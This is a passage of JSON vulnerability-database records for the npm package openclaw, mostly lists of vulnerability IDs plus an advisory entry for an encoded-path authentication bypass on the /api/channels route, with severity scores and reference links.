CID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerabi
lity":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerabi
lity":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerabi
lity":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerabi
lity":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13-beta.1"}],"aliases":["GHSA-c447-w54g-f55j"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-44hp-3xh1-uyen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50538?format=json","vulnerability_id":"VCID-49b4-qwz6-q7he","summary":"OpenClaw has encoded-path auth bypass in plugin `/api/channels` route classification\nEncoded alternate-path requests could bypass plugin route auth checks for `/api/channels/*` due to canonicalization depth mismatch in vulnerable builds.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32004","reference_id":"","reference_type":"","scores":[{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22535","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22584","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00074","scoring_system":"epss","scoring_elements":"0.22597","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32004"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2fd8264ab03bd178e62a
5f0c50d1c8556c17f12d","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2fd8264ab03bd178e62a5f0c50d1c8556c17f12d"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a7eee920a176a0043398c6b37bf4cc6eb983eeb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7a7eee920a176a0043398c6b37bf4cc6eb983eeb"},{"reference_url":"https://github.com/openclaw/openclaw/commit/93b07240257919f770d1e263e1f22753937b80ea","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/93b07240257919f770d1e263e1f22753937b80ea"},{"reference_url":"https://github.com/openclaw/op
enclaw/commit/d74bc257d8432f17e50b23ae713d7e0623a1fe0f","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d74bc257d8432f17e50b23ae713d7e0623a1fe0f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-encoded-path-in-api-channels-route","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-encoded-path-in-api-channels-route"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32004","reference_id":"CVE-2026-32004","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32004"},{"reference_url":"https://github.com/advisories/GHSA-v865-p3gq-hw6m","reference_id":"GHSA-v865-p3gq-hw6m","reference_type":"","scores":[{"value":"HIGH
","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v865-p3gq-hw6m"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v865-p3gq-hw6m","reference_id":"GHSA-v865-p3gq-hw6m","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T18:26:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v865-p3gq-hw6m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6
ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-r
kfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c
3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2
uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnera